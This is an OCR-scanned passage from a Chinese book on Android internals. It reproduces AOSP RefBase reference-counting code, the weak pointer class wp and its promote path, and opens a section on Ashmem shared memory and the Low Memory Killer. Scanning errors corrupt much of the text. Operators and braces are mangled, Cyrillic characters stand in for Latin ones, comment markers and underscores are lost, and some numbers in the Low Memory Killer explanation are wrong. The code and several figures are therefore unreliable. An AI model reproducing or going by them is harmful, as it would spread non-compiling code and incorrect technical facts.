inline void trackMe(bool enable, bool retain) 
{ 
getWeakRefs()->trackMe(enable, retain); 
} 
typedef RefBase basetype; 
protected: 
RefBase(); 
virtual~RefBase(); 
1 Flags for extendObjectLifetime() 
enum { 
OBJECT_LIFETIME_STRONG = 0x0000, 
OBJECT_LIFETIME_WEAK = 0x0001, 
OBJECT LIFETIME MASK = 0x0001 


void extendObjectLifetime(int32 t mode); 


II! Flags for onincStrongAttempted() 
enum ( 

FIRST INC. STRONG = 0x0001 
Е 


virtual void onFirstRef(); 
virtual void onLastStrongRef(const void* id); 
virtual bool onlncStrongAttempted(uint32_t flags, const void* id); 
virtual void onLastWeakRef(const void* id); 
private: 
friend class ReferenceMover; 
static void moveReferences(void* d, void const* s, size_t n, 
const ReferenceConverterBase& caster); 
private: 
friend class weakref type; 
class weakref impl; 
RefBase(const RefBase& o); 
RefBase&operator-(const RefBase& o); 
weakref impl* const mRefs; 
Е 
在 类 RefBase 中 ， 其 成 员 变 量 mRefs 的 类 型 为 weakref impl 指针 。 类 RefBase 的 具体 实现 在 文件 
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frameworks/native/libs/utils/RefBase.cpp 中 定义 ， 有 具体 实现 代码 如 下 所 示 。 
class RefBase::weakref impl : public RefBase::weakref type 
{ 
public: 
volatile int32 t mStrong; 
volatile int32 t mWeak; 
RefBase* const mBase; 
volatile int32 t mFlags; 


#if IDEBUG REFS 


weakref impl(RefBase* base) 
: mStrong(INITIAL STRONG VALUE) 


, mWeak(0) 
, mBase(base) 
, mFlags(0) 

{ 

} 


void addStrongRef(const void* /*id*/) ( ) 

void removeStrongRef(const void* /*id*/) { } 

void renameStrongRefld(const void* /*old_id*/, const void* /*new id*/) ( } 
void addWeakRef(const void* /*id*/) ( ) 

void removeWeakRef(const void* /*id*/) ( } 

void renameWeakRefld(const void* /*old id*/, const void* /*new_id*/) { } 
void printRefs() const ( } 

void trackMe(bool, bool) { ) 


#else 


weakref impl(RefBase* base) 
: mStrong(INITIAL STRONG VALUE) 
, mWeak(0) 
, mBase(base) 
, mFlags(0) 
, mStrongRefs(NULL) 
, mWeakRefs(NULL) 
,mTrackEnabled(!IDEBUG REFS ENABLED BY DEFAULT) 
, mRetain(false) 

{ 

} 


-weakref impl() 
t 
bool dumpStack - false; 
if (ImRetain && mStrongRefs != NULL) ( 
dumpStack - true; 
Tif DEBUG REFS FATAL SANITY CHECKS 
LOG ALWAYS FATAL('Strong references remain!"); 
#else 
ALOGE("Strong references remain:"); 
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#endif 
ref_entry* refs = mStrongRefs; 
while (refs) ( 
char inc = refs->ref >= 07'+':'-'; 
ALOGD("\t%c ID %p (ref %d):", inc, refs->id, refs->ref); 
#if DEBUG REFS CALLSTACK ENABLED 
refs->stack.dump(); 
#endif 
refs = refs->next; 


} 


if (ImRetain && mWeakRefs != NULL) { 
dumpStack = true; 
#if DEBUG REFS FATAL SANITY CHECKS 
LOG ALWAYS FATAL("Weak references remain:"); 
#else 
ALOGE("Weak references remain!"); 
#endif 
ref_entry* refs = mWeakRefs; 
while (refs){ 
char inc = refs->ref >= 0 ? '+': "~ 
ALOGD("\t%c ID %p (ref %а):", inc, refs->id, refs->ref); 
#if DEBUG REFS CALLSTACK ENABLED 
refs-»stack.dump(); 


#endif 
refs = refs->next; 

} 

} 

if (dumpStack) { 
ALOGE("above errors at:"); 
CallStack stack; 
stack.update(); 
stack.dump(); 

} 

} 


void addStrongRef(const void* id) { 
//ALOGD_IF(mTrackEnabled, 
Il "addStrongRef: RefBase=%p, id=%p", mBase, id); 
addRef(&mStrongRefs, id, mStrong); 

) 


void removeStrongRef(const void* id) ( 
IIALOGD IF(mTrackEnabled, 
1 "removeStrongRef: RefBase=%p, id=%p", mBase, id); 
if (ImRetain) ( 
removeRef(&mStrongRefs, id); 
) else { 
addRef(&mStrongRefs, id, -mStrong); 
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} 


void renameStrongRefld(const void* old id, const void* new id) { 
//ALOGD_IF(mTrackEnabled, 
Il "renameStrongRefld: RefBase=%p, oid=%p, nid=%p", 
Il mBase, old id, new id); 
renameRefsld(mStrongRefs, old id, new id); 

) 


void addWeakRef(const void* id) ( 
addRef(&mWeakRefs, id, mWeak); 


} 
void removeWeakRef(const void* id) { 
if (ImRetain) { 
removeRef(&mWeakRefs, id); 
) else { 


addRef(&mWeakRefs, id, -mWeak); 
} 
} 


void renameWeakRefld(const void* old_id, const void* new_id) { 
renameRefsld(mWeakRefs, old id, new id); 


) 
void trackMe(bool track, bool retain) 
{ 
mTrackEnabled = track; 
mRetain = retain; 
} 
void printRefs() const 
{ 
String8 text; 
{ 


Mutex::Autolock _I(mMutex); 
char buf[128]; 
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sprintf(buf, "Strong references on RefBase %p (weakref type %p):\n", mBase, this); 


text.append(buf); 
printRefsLocked(&text, mStrongRefs); 


sprintf(buf, "Weak references on RefBase %p (weakref type %р):\п", mBase, this); 


text.append(buf); 
printRefsLocked(&text, mWeakRefs); 


char name[100]; 

snprintf(name, 100, "/data/%p.stack", this); 

int rc = ореп(пате, O_RDWR | O CREAT | О APPEND); 
if (rc >= 0) { 
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write(rc, text.string(), text.length()); 
close(rc); 
ALOGD("STACK TRACE for %р saved in 96s", this, name); 
} 
else ALOGE("FAILED ТО PRINT STACK TRACE for %p їп %s: %5", this, 
name, strerror(errno)); 


) 


private: 
struct ref_entry 
{ 
ref_entry* next; 
const void* id; 
#if DEBUG REFS CALLSTACK ENABLED 
CallStack stack; 


#endif 
int32_t ref; 
Е 
void addRef(ref entry** refs, const void* id, int32 t mRef) 
{ 
if (mTrackEnabled) ( 
AutoMutex l(mMutex); 
ref entry* ref = new ref entry; 
11 Reference count at the time of the snapshot, but before the 
11 update. Positive value means we increment, negative-we 
ll decrement the reference count 
ref->ref = mRef; 
ref->id = id; 
#if DEBUG REFS CALLSTACK ENABLED 
ref->stack.update(2); 
#endif 


ref->next = *refs; 
*refs = ref; 


} 


void removeRef(ref_entry** refs, const void* id) 
{ 
if (mTrackEnabled) { 
AutoMutex l(mMutex); 


ref entry* const head = “refs; 
ref_entry* ref = head; 
while (ref != NULL) { 
if (ref->id == id) { 
*refs = ref->next; 
delete ref; 
return; 
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} 
refs = &ref->next; 
ref = *refs; 


} 


#if DEBUG REFS FATAL SANITY CHECKS 
LOG ALWAYS FATAL("RefBase: removing id %p on RefBase %p" 
"(weakref type %p) that doesn't exist!", 
id, mBase, this); 
#endif 


ALOGE("RefBase: removing id %p on RefBase %р" 
"(weakref type %p) that doesn't exist!", 
id, mBase, this); 


ref = head; 

while (ref) ( 
char inc = ref->ref >= 0 ? '+' : 
ALOGD("\t%c ID %p (ref 95d): 
ref = ref->next; 


, inc, ref->id, ref->ref); 
} 


CallStack stack; 
stack.update(); 
stack.dump(); 


} 


void renameRefsld(ref_entry* r, const void* old_id, const void* new_id) 
{ 
if (mTrackEnabled) { 
AutoMutex l(mMutex); 
ref entry* ref = r; 
while (ref != NULL) { 
if (ref->id == old_id) { 
ref->id = new_id; 
} 


ref = ref->next; 


} 


void printRefsLocked(String8* out, const ref_entry* refs) const 
{ 
char buf[128]; 
while (refs) { 
char inc = refs->ref >= 0 ?  : '-: 
sprintf(buf, "\t%c ID %p (ref %d):\n", 
inc, refs->id, refs->ref); 
out->append(buf); 
#if DEBUG_REFS_CALLSTACK_ENABLED 
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out->append(refs->stack.toString("\t\t")); 


#else 
out->append("\t\t(call stacks disabled)"); 
#endif 
refs = refs->next; 
} 
} 


mutable Mutex mMutex; 
ref entry* mStrongRefs; 
ref entry* mWeakRefs; 


bool mTrackEnabled; 

11 Collect stack traces on addref and removeref, instead of deleting the stack references 
11 on removeref that match the address ones 

bool mRetain; 


void RefBase::incStrong(const void* id) const 
d 
weakref impl* const refs = mRefs; 
refs->incWeak(id); 


refs->addStrongRef(id); 

const int32_t c = android_atomic_inc(&refs->mStrong); 

ALOG ASSERT(c > 0, "incStrong() called on %p after last strong ref", refs); 
#if PRINT REFS 

ALOGD("incStrong of %p from %p: cnt=%d\n", this, id, c); 
#endif 

if (c != INITIAL STRONG VALUE) { 

return; 


) 


android atomic add(-INITIAL STRONG VALUE, &refs->mStrong); 
refs->mBase->onFirstRef(); 


} 


void RefBase::decStrong(const void* id) const 
{ 
weakref impl* const refs = mRefs; 
refs->removeStrongRef(id); 
const int32_t c = android_atomic_dec(&refs->mStrong); 
#if PRINT_REFS 
ALOGD("decStrong of %p from %p: cnt=%d\n", this, id, c); 


#endif 
ALOG_ASSERT(c >= 1, "decStrong() called on %p too many times", refs); 
if (c == 1) { 
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refs->mBase->onLastStrongRef(id); 
if ((refs-»mFlags&OBJECT LIFETIME MASK) == OBJECT LIFETIME STRONG){ 
delete this; 
} 
} 
refs->decWeak(id); 
} 


void RefBase::forcelncStrong(const void* id) const 
{ 
weakref impl* const refs = mRefs; 
refs->incWeak(id); 


refs->addStrongRef(id); 
const int32_t c = android_atomic_inc(&refs->mStrong); 
ALOG_ASSERT(c >= 0, "forcelncStrong called on %p after ref count underflow", 
refs); 
#if PRINT_REFS 
ALOGD("forcelncStrong of %p from %p: cnt=%d\n", this, id, c); 
#endif 


switch (c) { 
case INITIAL_STRONG_VALUE: 
android_atomic_add(-INITIAL_STRONG_VALUE, &refs->mStrong); 


// fall through... 
case 0: 
refs->mBase->onFirstRef(); 
} 
} 
int32_t RefBase::getStrongCount() const 
{ 
return mRefs->mStrong; 
} 
RefBase* RefBase::weakref_type::refBase() const 
{ 
return static_cast<const weakref impl*»(this)-»mBase; 
) 
void RefBase::weakref_type::incWeak(const void* id) 
{ 
weakref impl* const impl = static_cast<weakref_imp|*>(this); 
impl->addWeakRef(id); 
const int32 t c = android atomic inc(&impl-»mWeak); 
ALOG ASSERT(c >= 0, "incWeak called on %p after last weak ref", this); 
) 


void RefBase::weakref type::decWeak(const void* id) 
{ 
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weakref impl* const impl = static_cast<weakref_impl*>(this); 
impl-»removeWeakRef(id); 

const int32 t c = android atomic dec(&impl-»mWeak); 

ALOG ASSERT(c >= 1, "decWeak called on %p too many times", this); 
if (c != 1) return; 


if (impl-»mFlags&OBJECT LIFETIME WEAK) == OBJECT LIFETIME STRONG)( 
11 This is the regular lifetime case. The object is destroyed 
// when the last strong reference goes away. Since weakref impl 
// outlive the object, it is not destroyed in the dtor, and 
II we'll have to do it here 
if (impl-»mStrong == INITIAL STRONG VALUE) { 
11 Special case: we never had a strong reference, so we need to 
ll destroy the object now 
delete impl-»mBase; 
) else { 
I| ALOGV("Freeing refs %р of old RefBase %p\n", this, impl-»mBase); 
delete impl; 
} 
) else { 
11 less common case: lifetime is OBJECT LIFETIME (WEAK|FOREVER) 
impl-»mBase-»onLastWeakRef(id); 
if (impl-»mFlags&OBJECT LIFETIME MASK) == OBJECT LIFETIME WEAK) { 
/ this is the OBJECT LIFETIME WEAK case. The last weak-reference 
11 is gone, we can destroy the object 
delete impl-»mBase; 


) 


bool RefBase::weakref_type::attemptIncStrong(const void* id) 


{ 
incWeak(id); 


weakref impl* const impl = static саѕі<меакгеѓ impl*»(this); 


int32 t curCount = impl-»mStrong; 
ALOG ASSERT(curCount >= 0, "attemptIncStrong called on %p after underflow", 
this); 
while (curCount > 0 && curCount != INITIAL STRONG VALUE) ( 
if (android atomic cmpxchg(curCount, curCount+1, &impl->mStrong) == 0) ( 


break; 
) 
curCount = impl->mStrong; 
} 
if (curCount <= 0 || curCount == INITIAL STRONG VALUE) { 


bool allow; 

if (curCount == INITIAL_STRONG_VALUE) { 
11 Attempting to acquire first strong reference... this is allowed 
11 if the object does NOT have a longer lifetime (meaning the 
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ll implementation doesn't need to see this), or if the implementation 

11 allows it to happen 

allow = (impl->mFlags&OBJECT_LIFETIME_WEAK) != OBJECT LIFETIME WEAK 
|| impl-»mBase-»onincStrongAttempted(FIRST INC STRONG, id); 

) else { 

11 Attempting to revive the object... this is allowed 

I| if the object DOES have a longer lifetime (so we can safely 

// call the object with only a weak ref) and the implementation 

11 allows it to happen 

allow = (impl-»mFlags&OBJECT LIFETIME WEAK) == OBJECT LIFETIME WEAK 
&& impl-»mBase-»onIncStrongAttempted(FIRST INC STRONG, id); 


} 

if (tallow) { 
decWeak(id); 
return false; 

} 


curCount = android atomic inc(&impl-»mStrong); 


/I If the strong reference count has already been incremented by 

// someone else, the implementor of onIncStrongAttempted() is holding 

// an unneeded reference. So call onLastStrongRef() here to remove it. 

// (No, this is not pretty.) Note that we MUST NOT do this if we 

11 are in fact acquiring the first reference 

if (curCount » 0 && curCount « INITIAL STRONG VALUE) ( 
impl->mBase->onLastStrongRef(id); 

} 


impl->addStrongRef(id); 


#if PRINT_REFS 
ALOGD("attemptincStrong of %p from %р: cnt=%d\n", this, id, curCount); 


if (curCount == INITIAL. STRONG. VALUE) { 


android atomic add(-INITIAL STRONG VALUE, &impl-»mStrong); 
impl->mBase->onFirstRef(); 


return true; 


bool RefBase::weakref_type::attemptincWeak(const void* id) 
weakref impl* const impl = static_cast<weakref_imp|*>(this); 


int32_t curCount = impl-»mWeak; 
ALOG ASSERT(curCount >= 0, "attemptIncWeak called on %p after underflow", 


this); 


while (curCount > 0) { 


if (android atomic cmpxchg(curCount, curCount+1, &impl-»mWeak) == 0) { 
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break; 
} 
curCount = impl-»mWeak; 
} 
if (curCount > 0) { 
impl->addWeakRef(id); 
} 
return curCount > 0; 
} 
int32_t RefBase::weakref_type::getWeakCount() const 
i 
return static_cast<const weakref impl*»(this)-»mWeak; 
} 
void RefBase::weakref_type::printRefs() const 
{ 
static_cast<const weakref_impl*>(this)->printRefs(); 
} 


void RefBase::weakref_type::trackMe(bool enable, bool retain) 
z 


static_cast<weakref_imp|*>(this)->trackMe(enable, retain); 


) 


RefBase::weakref type* RefBase::createWeak(const void* id) const 


{ 


mRefs->incWeak(id); 
return mRefs; 
) 
RefBase::weakref type* RefBase::getWeakRefs() const 
{ 
return mRefs; 
) 


RefBase::RefBase() 

: mRefs(new weakref impl(this)) 
{ 
} 


RefBase::-RefBase() 
{ 
if (mRefs->mStrong == INITIAL_STRONG_VALUE) ( 
// we never acquired a strong (and/or weak) reference on this object 
delete mRefs; 
) else ( 
// life-time of this object is extended to WEAK or FOREVER, in 
// which case weakref impl doesn't out-live the object and we 
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ll can free it now 
if ((mRefs->mFlags & OBJECT LIFETIME MASK) != OBJECT LIFETIME STRONG) ( 
ЇЇ It's possible that the weak count is not 0 if the object 
I| re-acquired a weak reference in its destructor 
if (mRefs->mWeak == 0) ( 
delete mRefs; 
} 
} 
} 
11 for debugging purposes, clear this 
const cast«weakref impl*&»(mRefs) = NULL; 
} 


void RefBase::extendObjectLifetime(int32 t mode) 


{ 
android atomic or(mode, &mRefs->mFlags); 
} 


void RefBase::onFirstRef() 
d 
} 


void RefBase::onLastStrongRef(const void* /*id*/) 
d 
} 


bool RefBase::onIncStrongAttempted(uint32 t flags, const void* id) 
{ 


} 


return (flags&FIRST_INC_STRONG) ? true : false; 


void RefBase::onLastWeakRef(const void* /*id*/) 
{ 
} 


flle 


void RefBase::moveReferences(void* dst, void const* src, size t n, 
const ReferenceConverterBase& caster) 
{ 
#if DEBUG_REFS 
const size_t itemSize = caster.getReferenceTypeSize(); 
for (size_t i=0 ; i<n ; i++) ( 
void*d = reinterpret_cast<void*>(intptr_t(dst) + i*itemSize); 
void const* s = reinterpret_cast<void const*>(intptr_t(src) + i*itemSize); 
RefBase* ref(reinterpret_cast<RefBase*>(caster.getReferenceBase(d))); 
ref->mRefs->renameStrongRefld(s, d); 
ref->mRefs->renameWeakRefld(s, d); 


#endif 
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ГА = = 
TextOutput& printStrongPointer(TextOutput& to, const void* val) 
{ 


to << "sp<>(" << val << ")"; 
return to; 


} 
TextOutput& printWeakPointer(TextOutput& to, const void* val) 


to << "wp<>(" << val << ")"; 
return to; 


} 


}; // namespace android 
整个 上 述 代 码 被 分 为 了 如 下 两 大 部 分 。 
(1) 用 如 下 DEBUG REFS 标记 标识 的 部 分 ， 表 示 类 weakref impl 被 编译 成 调试 版 本 。Debug 版 本 的 
源 代 码 的 成 员 函 数 都 是 有 实现 的 ， 实 现 这 些 函数 的 目的 都 是 便于 开发 人 员 调 试 引用 计数 用 。 
#if IDEBUG REFS 


#else 
(2) 用 如 下 标记 标识 的 部 分 ， 表 示 类 weakref_impl 被 编译 成 非 调 试 版 本 。 
#else 


#endif 


5.2.5 “ 弱 指 针 


在 Android 系统 中 ， 弱 指针 和 强 指针 使 用 一 样 的 引用 计数 类 一 一 RefBase 类 。 和 强 指针 类 一 样 ， 弱 指针 
也 有 一 个 指向 目标 对 象 的 成 员 变量 m_ptr。 另 外 ， 弱 指针 还 有 一 个 类 型 是 weakref type 指针 的 额外 的 成 员 变 
量 m теб. JS wp 在 文件 frameworks/native/include/utils/RefBase.h 中 定义 ， 具 体 实现 代码 如 下 所 示 。 

template <typename T> 

class wp 


{ 
public: 
typedef typename RefBase::weakref type weakref type; 


inline wp() : m_ptr(0) () 


wp(T* other); 

wp(const wp<T>& other); 

wp(const sp<T>& other); 

template<typename U> wp(U* other); 
template<typename U> wp(const sp<U>& other); 
template<typename U> wp(const wp<U>& other); 


~wp(); 
11 Assignment 


wp& operator = (T* other); 
wp& operator = (const wp<T>& other); 
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wp& operator = (const sp<T>& other); 

template<typename U> wp& operator = (U* other); 
template<typename U> wp& operator = (const wp«U»& other); 
template<typename U> wp& operator = (const sp<U>& other); 
void set object and refs(T* other, weakref type* refs); 

// promotion to sp 

sp<T> promote() const; 

11 Reset 

void clear(); 

ll Accessors 

inline weakref type* get refs() const ( return m refs; ) 

inline T* unsafe get() const ( return m ptr; ) 

// Operators 

COMPARE WEAK(--) 

COMPARE WEAK(!=) 

COMPARE WEAK(») 

COMPARE WEAK(«) 

COMPARE WEAK(«-) 

COMPARE WEAK(»-) 


inline bool operatot 
return (m ptr == 


(const wp<T>& o) const ( 
.m ptr) && (m refs == o.m refs); 


) 

template<typename U> 

inline bool operator == (const wp<U>& o) const { 
return m ptr == o.m ptr; 

) 


inline bool operator > (const wp<T>& o) const ( 

return (m ptr == o.m ptr) ? (m refs > o.m refs) : (m ptr > o.m ptr); 
) 
template<typename U> 
inline bool operator > (const wp<U>& o) const { 

return (m ptr == o.m ptr) ? (m refs > o.m refs) : (m ptr > o.m ptr); 
5 


inline bool operator < (const wp<T>& o) const ( 
return (m ptr == o.m ptr) ? (m refs < o.m refs) : (m ptr < o.m ptr); 
) 


template<typename U> 
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inline bool operator < (const wp<U>& o) const { 
return (m ptr == o.m ptr) ? (m refs < o.m refs) : (m ptr < o.m ptr); 
} 
inline bool operator != (const wp<T>& о) const ( return m refs != o.m refs; ) 
template<typename U> inline bool operator != (const wp<U>& o) const ( return !operator == (0); } 
inline bool operator <= (const wp<T>& o) const ( return !operator > (o); } 
template<typename U> inline bool operator <= (const wp«U»& o) const ( return !operator > (o); } 
inline bool operator >= (const wp<T>& o) const ( return loperator < (о); } 
template<typename U> inline bool operator >= (const wp<U>& o) const ( return loperator < (о); } 


private: 
template<typename Y> friend class sp; 
template<typename Y> friend class wp; 


T*m ptr; 
weakref type*m refs; 


X 
类 wp 的 构造 函数 的 实现 代码 如 下 所 示 。 
template<typename T> 
wp<T>::wp(T* other) 
:m ptr(other) 


if (other) m refs = other->createWeak(this); 


) 

在 上 述 代码 中 ， 参 数 other 类 继承 于 类 RefBase， 并 调用 了 类 RefBase 的 成 员 函 数 createWeak()。 函 数 
createWeak() 在 文件 frameworks/native/libs/utils/RefBase.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 

RefBase::weakref_type* RefBase::createWeak(const void* id) const 


{ 
mRefs->incWeak(id); 
retum mRefs;// mRefs 的 类 型 为 weakref_impl 指针 


} 

再 看 类 wp 的 析 构 函数 ， 此 函数 直接 调用 目标 对 象 的 weakref impl 对 象 的 函数 decWeak()， 目 的 是 减少 
弱 引 用 计数 。 当 弱 引 用 计数 为 0 时 ， 根 据 在 目标 对 象 的 标志 位 CO. OBJECT LIFETIME WEAK 或 者 
OBJECT LIFETIME FOREVER) 来 决定 是 否 要 delete (删除 ) 目标 对 象 。 下 面 是 析 构 函数 的 实现 代码 。 

template<typename T> 

wp<T>::~wp() 


if (m_ptr) m_refs->decWeak(this); 


} 

弱 指针 的 最 大 特点 是 不 能 直接 操作 目标 对 象 ， 原 因 是 弱 指针 类 没有 重 载 “* ”和 “->” 操 作 符号 ， 而 强 
指针 重 载 了 这 两 个 操作 符号 。 如 果 坚 持 要 操作 目标 对 象 ， 则 需要 把 弱 指针 升级 为 强 指针 。 升 级 方法 是 使 用 
成 员 变量 m ptr 和 m refs 构造 一 个 强 指针 sp, m ptr 是 指 目标 对 象 的 一 个 指针 , m refs 是 指 指向 目标 对 象 里 
面 的 weakref impl 对 象 。 升 级 代码 如 下 所 示 。 

template<typename T> 

sp<T> wp<T>::promote() const 

{ 


return sp<T>(m_ptr, m_refs); 
} 


@ 
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与 之 对 应 的 强 指针 构造 代码 如 下 所 示 。 
template<typename T> 
sp<T>::sp(T* p, weakref type* refs) 


:m ptr((p && 
{ 
} 
在 上 述 构 造 代码 


refs->attemptincStrong(this)) ? p : 0) 


P， 初 始 化 指向 了 目标 对 象 的 成 员 变量 m_ptr。 如 果 还 存在 目标 对 象 ， 则 m ptr 指向 目 


标 对 象 。 如 果 这 个 目标 对 象 已 经 不 存在 ， 则 m ptr 为 NULL。 是 否 升级 成 功 需 要 参考 函数 attemptlncStrong() 
的 返回 结果 。 函 数 attemptIncStrong() 的 具体 实现 代码 如 下 所 示 。 
bool RefBase::weakref type::attemptlncStrong(const void* id) 


{ 
incWeak(id); 


weakref impl 


* const impl = static cast«weakref impl*»(this); 


int32 t curCount = impl->mStrong; 
LOG ASSERT(curCount >= 0, "attemptIncStrong called on %p after underflow", 


this); 


while (curCount > 0 && curCount != INITIAL STRONG VALUE) { 
if (android atomic cmpxchg(curCount, curCount+1, &impl->mStrong) == 0) ( 
break; 


) 


curCount = impl->mStrong; 


} 


if (curCount <= 0 || curCount == INITIAL STRONG VALUE) { 
bool allow; 
if (curCount == INITIAL_STRONG_VALUE) { 
// Attempting to acquire first strong reference... this is allowed 
Il if the object does NOT have a longer lifetime (meaning the 
// implementation doesn't need to see this), or if the implementation 
11 allows it to happen 
allow = (impl-»mFlags&OBJECT LIFETIME WEAK) != OBJECT. LIFETIME WEAK 


) else { 


|| impl->mBase->onIncStrongAttempted(FIRST INC STRONG, id); 


// Attempting to revive the object... this is allowed 

Il if the object DOES have a longer lifetime (so we can safely 

// call the object with only a weak ref) and the implementation 

// allows it to happen 

allow = (impl-»mFlags&OBJECT. LIFETIME WEAK) == OBJECT. LIFETIME WEAK 


&& impl-»mBase-»onIncStrongAttempted(FIRST INC STRONG, id); 


} 

if (lallow) { 
decWeak(id); 
return false; 

H 


curCount = android atomic inc(&impl-»mStrong); 


1 lf the strong reference count has already been incremented by 

/ll someone else, the implementor of onIncStrongAttempted() is holding 
11 an unneeded reference. So call onLastStrongRef() here to remove it 
II (No, this is not pretty.) Note that we MUST NOT do this if we 
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// are in fact acquiring the first reference 
if (curCount > 0 && curCount < INITIAL STRONG VALUE) { 
impl->mBase->onLastStrongRef(id); 
} 
} 


impl->addWeakRef(id); 
impl->addStrongRef(id); 


#if PRINT REFS 
LOGD("attemptincStrong of %p from %р: cnt=%d\n", this, id, curCount); 
#endif 


if (curCount == INITIAL STRONG VALUE) ( 
android atomic add(-INITIAL STRONG VALUE, &impl-»mStrong); 
impl->mBase->onFirstRef(); 

} 


return true; 


5.33 Android 内 存 系统 的 安全 机 制 分 析 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 5 章 \Android 内 存 系统 的 安全 机 制 分 析 .avi 
在 本 章 前 面 的 内 容 中 ， 已 经 详细 讲解 了 Android 内 存 系统 的 运行 机 制 和 有 具体 原理 。 本 节 将 对 Android 内 
存 系统 进行 总 结 ， 详 细 探 讨 Android 内 存 系统 中 的 安全 机 制 。 


5.3.1 Ashmem 匿名 共享 内 存 的 原理 


TE Android 系统 中 ,其 匿名 共享 内 存 (Ashmem) 机 制 是 一 个 基于 Linux 内 核 的 共享 内 存 机 制 .但 是 Android 
将 Ashmem 与 cache shrinker 进行 了 关联 ， 额 外 增加 了 内 存 回 收 算法 的 注册 接口 。 正 因 如 此 ，Linux 内 存 管 
理 系 统 将 不 再 使 用 内 存 区 域 加 以 回收 。Android 系统 的 Ashmem 机 制 以 内 核 驱动 的 形式 实现 ， 即 在 文件 系统 
中 以 创建 /dev/ashmem 设备 文件 的 方式 实现 。 例 如 ， 如 果 进 程 A 与 进程 B 需要 共享 内 存 ， 则 进程 A 可 以 通 
过 open 打开 该 文件 ， 可 以 使 用 ioctl 命令 ASHMEM_SET_NAME 和 ASHMEM_SET_SIZE 来 设置 共享 内 存 
的 名 字 和 大 小 。 

在 Android 系统 中 , 为 了 实现 有 效 回收 , 需要 该 内 存 区 域 的 所 有 者 去 通知 Ashmem 驱动 。 这 样 通过 用 户 、 
Ashmem 驱动 程序 和 Linux 内 存 管理 系统 三 者 的 协调 工作 , 使 整个 内 存 管理 机 制 更 加 适应 嵌入 式 移动 设备 内 
存 比较 小 的 特点 。 通 过 使 用 Ashmem 机 制 ， 可 以 辅助 内 存 管理 系统 来 有 效 管 理 不 再 使 用 的 内 存 ， 同 时 通过 
Binder 进程 通信 机 制 实 现 进程 间 的 内 存 共享 。 

在 Android 系统 中 ，Ashmem 不 但 与 /dev/ashmem 设备 文件 的 形式 和 Linux 开发 相关 联 ， 而 且 在 运行 
Android 系统 时 和 应 用 程序 框架 层 分 别提 供 了 如 下 访问 接口 。 

口 在 系统 运行 时 提供 了 C/C++ 调用 接口 。 

口 在 应 用 程序 框架 层 提供 了 Java 调 用 接口 。 

在 Android 系统 中 ， 应 用 程序 框架 层 的 Java 调用 接口 是 通过 JNI 方法 来 调用 系统 运行 时 的 C/C++ 调用 
接口 的 ， 最 后 进入 到 内 核 室 间 的 Ashmem 驱动 程序 中 。 


@ 


5.3.2 ”使 用 Low Memory Killer #7. S3 ze & $n 555: 


在 Android 系统 中 ，Low Memory Killer 在 用 户 空 间 中 设置 了 一 组 内 存 临界 值 。 如 果 其 中 某 个 值 与 进程 
描述 中 的 oom adj 值 在 同一 个 范围 ， 则 会 kill 掉 该 进程 。 在 如 下 所 示 的 文件 中 指定 了 oom adj 的 最 小 值 : 
/sys/module/lowmemorykiller/parameters/adj 
在 如 下 所 示 的 文件 中 储存 空闲 页 面 的 数量 。 
/sys/module/lowmemorykiller/parameters/minfree 
存储 的 空闲 页 面 数量 值 都 用 一 个 逗号 将 其 隔 开 且 以 升序 排列 ， 例 如 ， 将 “0.9” 写 入 到 /sysmodule/ 
lowmemorykiller/parameters/adj Ч", 1“ 1024,4096" “5 A SiJ/sys/module/lowmemory- killer/parameters/ minfree 中 ， 
就 表示 当 一 个 进程 的 空闲 存储 空间 下 降 到 4096 个 页 面 时 ， 会 kill 掉 oom_adj 值 为 9 的 或 者 更 大 的 进程 。 同 
样 道理 ， 当 一 个 进程 的 空闲 存储 空间 下 降 到 1024 个 页 面 时 ， 会 kill 掉 oom adj 值 为 0 或 者 更 大 的 进程 。 其 
实在 文件 lowmemorykiller.c 中 会 发 现 指定 了 这 样 的 值 ， 具 体 代码 如 下 所 示 。 
static int lowmem_adj[6] = { 
0, 
1, 
6, 
12, 
Е 
static int lowmem adj size = 4; 
static size t lowmem minfree[6] = ( 
3*512, // 6MB 
2*1024, // 8MB 
4*1024, // 16MB 
16*1024, // 64MB 
y 
static int lowmem minfree size = 4; 
由 此 可 见 ， 当 一 个 进程 的 空闲 空间 在 下 降 到 3512 个 页 面 时 , 会 КШ 掉 oom adj 值 为 0 或 者 更 大 的 进程 ， 
当 一 个 进程 的 空闲 空间 下 降 到 21024 个 页 面 时 ， 会 kill 掉 oom adj 值 为 10 或 者 更 大 的 进程 ， 继 续 下 去 ， 依 
此 类 推 。 其 实在 现实 应 用 中 ， 可 以 将 上 述 过 程 概括 为 一 个 规律 : 满足 如 下 规则 的 进程 会 被 优先 Kill há. 
O task_struct->signal_struct->oom_adj， 越 大 的 越 优先 被 kill。 
口 占用 物理 内 存 最 多 的 进程 会 被 优先 kill。 
在 上 述 规则 中 ,signal_struct->oom_adj 表示 当 内 存 短缺 时 进程 被 选择 并 kill 的 优先 级 ， 取 值 范围 是 -17 一 
15。 如 果 是 -17， 则 表示 不 会 被 选中 ， 值 越 大 越 可 能 被 选中 。 当 某 个 进程 被 选中 后 ， 内 核 会 发 送 SIGKILL 信 
号 将 其 kill hii, 
实际 上 ，Low Memory Killer 驱动 程序 会 认为 被 用 于 缓存 的 存储 空间 都 要 被 释放 。 如 果 很 多 缓存 存储 空 
间 处 于 被 锁定 的 状态 ， 并 且 当 正常 的 oom killer 被 触发 之 前 是 不 会 kill 掉 这 些 进程 的 ， 这 将 是 一 个 非常 严重 


5.3.3 Low Memory Killer 机 制 和 OOM 的 对 比 
Android 系统 的 Low Memory Killer 机 制 和 Linux 标准 OOM (Out Of Memory) 机 制 相 比 ，Low Memory 
Killer 更 加 灵活 。 当 内 存 不 够 时 ， 该 策略 会 试图 结束 一 个 进程 。 组 件 Low Memory Killer 通过 调用 Linux 内 


存 管理 系统 的 接口 来 注册 一 个 shrinker， 此 处 的 shrinker 通过 Low Memory Killer 实现 。 
标准 Linux 内 核 OOM Killer 在 mm/oom kill.c 中 实现 ， 在 mm/page alloc.a alloc pages may oom 中 被 
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调用 。 文 件 oom К.с 最 主要 的 函数 是 out of memory0， 它 选择 一 个 bad 进程 杀 死 ， 通 过 发 送 SIGKILL 信 
号 来 杀 死 进程 。 

在 out of memory 中 通过 调用 select bad process 选择 杀 死 一 个 进程 ， 选 择 的 依据 在 badness() 函 数 中 实 
